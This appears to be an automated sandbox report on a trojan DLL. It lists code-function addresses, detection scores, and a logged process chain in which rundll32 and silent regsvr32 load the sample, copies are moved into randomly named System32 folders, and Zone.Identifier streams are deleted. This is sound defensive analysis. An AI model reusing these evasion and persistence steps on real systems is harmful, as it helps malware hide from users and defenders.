                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180016A802_2_0000000180016A80
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001EB042_2_000000018001EB04
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180018B102_2_0000000180018B10
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001CB182_2_000000018001CB18
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180016B8C2_2_0000000180016B8C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018004EBA02_2_000000018004EBA0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180018C542_2_0000000180018C54
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018002CCCC2_2_000000018002CCCC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180016CE82_2_0000000180016CE8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001CD002_2_000000018001CD00
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001ED302_2_000000018001ED30
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180018D982_2_0000000180018D98
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180016DF02_2_0000000180016DF0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018004CEC82_2_000000018004CEC8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180018EC82_2_0000000180018EC8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180016EF82_2_0000000180016EF8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001EF182_2_000000018001EF18
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001CF2C2_2_000000018001CF2C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180042F882_2_0000000180042F88
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180018FD02_2_0000000180018FD0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800170002_2_0000000180017000
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800190D82_2_00000001800190D8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001F1042_2_000000018001F104
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001D1142_2_000000018001D114
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800171582_2_0000000180017158
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018002D19C2_2_000000018002D19C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800191E02_2_00000001800191E0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800172602_2_0000000180017260
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001D2FC2_2_000000018001D2FC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018004F2FC2_2_000000018004F2FC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001B3102_2_000000018001B310
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001F3342_2_000000018001F334
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800193382_2_0000000180019338
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800173682_2_0000000180017368
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800194402_2_0000000180019440
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800174742_2_0000000180017474
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018002B49C2_2_000000018002B49C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001B4F82_2_000000018001B4F8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001F5202_2_000000018001F520
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001D5282_2_000000018001D528
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800195482_2_0000000180019548
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800175D02_2_00000001800175D0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800196502_2_0000000180019650
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018002D6802_2_000000018002D680
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800176D42_2_00000001800176D4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001F70C2_2_000000018001F70C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001D7102_2_000000018001D710
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001B7242_2_000000018001B724
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018004972C2_2_000000018004972C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800257402_2_0000000180025740
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800197B82_2_00000001800197B8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018004B7E82_2_000000018004B7E8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800178002_2_0000000180017800
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800198C02_2_00000001800198C0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018002B8D02_2_000000018002B8D0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001D8FC2_2_000000018001D8FC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800179082_2_0000000180017908
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001B90C2_2_000000018001B90C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001F93C2_2_000000018001F93C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800199C82_2_00000001800199C8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180017A102_2_0000000180017A10
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018003FA6C2_2_000000018003FA6C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180045A702_2_0000000180045A70
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180019AD02_2_0000000180019AD0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180025AD42_2_0000000180025AD4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001BAF42_2_000000018001BAF4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180017B182_2_0000000180017B18
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001DB2C2_2_000000018001DB2C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018002DB502_2_000000018002DB50
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180019C282_2_0000000180019C28
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180017C702_2_0000000180017C70
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018003BD002_2_000000018003BD00
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001DD182_2_000000018001DD18
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018002BD1C2_2_000000018002BD1C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001BD202_2_000000018001BD20
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180019D302_2_0000000180019D30
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180017D782_2_0000000180017D78
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180045A702_2_0000000180045A70
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180019E382_2_0000000180019E38
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180017E802_2_0000000180017E80
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180049EEC2_2_0000000180049EEC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180025EFC2_2_0000000180025EFC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001DF042_2_000000018001DF04
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001BF082_2_000000018001BF08
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018003FF1C2_2_000000018003FF1C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180019F402_2_0000000180019F40
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180017F882_2_0000000180017F88
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018002DFAC2_2_000000018002DFAC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_012400002_2_01240000
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_014274142_2_01427414
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0143B6BC2_2_0143B6BC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0142A8042_2_0142A804
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0142C8C02_2_0142C8C0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0142EB082_2_0142EB08
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_01415B182_2_01415B18
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_01428B3C2_2_01428B3C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_01421B882_2_01421B88
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0142BD642_2_0142BD64
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0141CCC82_2_0141CCC8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_01437E282_2_01437E28
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_014271442_2_01427144
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_014261102_2_01426110
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0142A1302_2_0142A130
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_014131F02_2_014131F0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_014151982_2_01415198
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_014141A82_2_014141A8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0141B1A82_2_0141B1A8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0142406C2_2_0142406C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_014140782_2_01414078
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_014110142_2_01411014
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_014340202_2_01434020
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0142B0282_2_0142B028
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_014190D42_2_014190D4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0143B0EC2_2_0143B0EC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0141B0F82_2_0141B0F8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0143A0882_2_0143A088
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_014130BC2_2_014130BC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_014113682_2_01411368
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_014243682_2_01424368
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0141D3002_2_0141D300
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0143A3042_2_0143A304
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_014333042_2_01433304
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0143632C2_2_0143632C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_014343302_2_01434330
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_014293E02_2_014293E0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0141B3E42_2_0141B3E4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_014313FC2_2_014313FC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_014193AC2_2_014193AC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0141E2542_2_0141E254
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0142D2542_2_0142D254
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_014232102_2_01423210
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0142F2382_2_0142F238
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_014172E02_2_014172E0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_014312FC2_2_014312FC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0141F2902_2_0141F290
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0141B2BC2_2_0141B2BC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0142B5582_2_0142B558
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0143155C2_2_0143155C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0143B5702_2_0143B570
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_014205782_2_01420578
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_014365202_2_01436520
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_014125D82_2_014125D8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0141F5802_2_0141F580
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_014245942_2_01424594
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_014265942_2_01426594
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0142C5AC2_2_0142C5AC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0143344C2_2_0143344C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0141C4582_2_0141C458
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0142A4082_2_0142A408
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_014264182_2_01426418
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0142D4D02_2_0142D4D0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_014384DC2_2_014384DC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_014224E42_2_014224E4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_014154842_2_01415484
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_014214A02_2_014214A0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0142E4A82_2_0142E4A8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0142F7642_2_0142F764
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_014127082_2_01412708
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_014297202_2_01429720
                      Source: C:\Windows\System32\loaddll64.exeCode function: String function: 0000000180046D38 appears 44 times
                      Source: C:\Windows\System32\regsvr32.exeCode function: String function: 0000000180046D38 appears 44 times
                      Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dllJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dllJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dllJump to behavior
                      Source: MIpuuSiSZ4.dllVirustotal: Detection: 72%
                      Source: MIpuuSiSZ4.dllMetadefender: Detection: 54%
                      Source: MIpuuSiSZ4.dllReversingLabs: Detection: 88%
                      Source: MIpuuSiSZ4.dllStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: C:\Windows\System32\loaddll64.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: unknownProcess created: C:\Windows\System32\loaddll64.exe loaddll64.exe "C:\Users\user\Desktop\MIpuuSiSZ4.dll"
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\MIpuuSiSZ4.dll",#1
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\MIpuuSiSZ4.dll
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\MIpuuSiSZ4.dll",#1
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\MIpuuSiSZ4.dll,AddStroke
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\MIpuuSiSZ4.dll,AddWordsToWordList
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\MIpuuSiSZ4.dll,AdviseInkChange
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 484 -p 6160 -ip 6160
                      Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\FmCnbLJkOlaRytmc\QMbXoKRooU.dll"
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 516 -p 3896 -ip 3896
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6160 -s 336
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 3896 -s 328
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\YbTPHZsAWIZFUi\eAeQcUPg.dll"
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\MIpuuSiSZ4.dll",#1Jump to behavior
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\MIpuuSiSZ4.dllJump to behavior
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\MIpuuSiSZ4.dll,AddStrokeJump to behavior
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\MIpuuSiSZ4.dll,AddWordsToWordListJump to behavior
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\MIpuuSiSZ4.dll,AdviseInkChangeJump to behavior
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\YbTPHZsAWIZFUi\eAeQcUPg.dll"Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\MIpuuSiSZ4.dll",#1Jump to behavior
                      Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\FmCnbLJkOlaRytmc\QMbXoKRooU.dll"Jump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 484 -p 6160 -ip 6160Jump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 516 -p 3896 -ip 3896Jump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6160 -s 336Jump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 3896 -s 328Jump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\loaddll64.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
                      Source: C:\Windows\System32\svchost.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\WERB89A.tmpJump to behavior
                      Source: classification engineClassification label: mal96.troj.evad.winDLL@34/16@0/28
                      Source: C:\Windows\System32\loaddll64.exeFile read: C:\Users\desktop.iniJump to behavior
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000001942A68A804 Process32FirstW,CreateToolhelp32Snapshot,Process32NextW,FindCloseChangeNotification,0_2_000001942A68A804
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\MIpuuSiSZ4.dll",#1
                      Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6160
                      Source: C:\Windows\System32\WerFault.exeMutant created: \BaseNamedObjects\Local\SM0:6496:120:WilError_01
                      Source: C:\Windows\System32\WerFault.exeMutant created: \BaseNamedObjects\Local\SM0:6568:120:WilError_01
                      Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3896
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800011AC LoadStringW,LoadStringW,FindResourceA,LoadResource,LockResource,0_2_00000001800011AC
                      Source: C:\Windows\System32\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: MIpuuSiSZ4.dllStatic PE information: Image base 0x180000000 > 0x60000000
                      Source: MIpuuSiSZ4.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                      Source: MIpuuSiSZ4.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                      Source: MIpuuSiSZ4.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                      Source: MIpuuSiSZ4.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: MIpuuSiSZ4.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                      Source: MIpuuSiSZ4.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                      Source: MIpuuSiSZ4.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: MIpuuSiSZ4.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                      Source: MIpuuSiSZ4.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                      Source: MIpuuSiSZ4.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                      Source: MIpuuSiSZ4.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                      Source: MIpuuSiSZ4.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000001942A678C72 push ebp; ret 0_2_000001942A678C7D
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_01418C72 push ebp; ret 2_2_01418C7D
                      Source: MIpuuSiSZ4.dllStatic PE information: section name: _RDATA
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\MIpuuSiSZ4.dll
                      Source: C:\Windows\System32\regsvr32.exePE file moved: C:\Windows\System32\FmCnbLJkOlaRytmc\QMbXoKRooU.dllJump to behavior

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Source: C:\Windows\System32\loaddll64.exeFile opened: C:\Windows\system32\YbTPHZsAWIZFUi\eAeQcUPg.dll:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeFile opened: C:\Windows\system32\FmCnbLJkOlaRytmc\QMbXoKRooU.dll:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
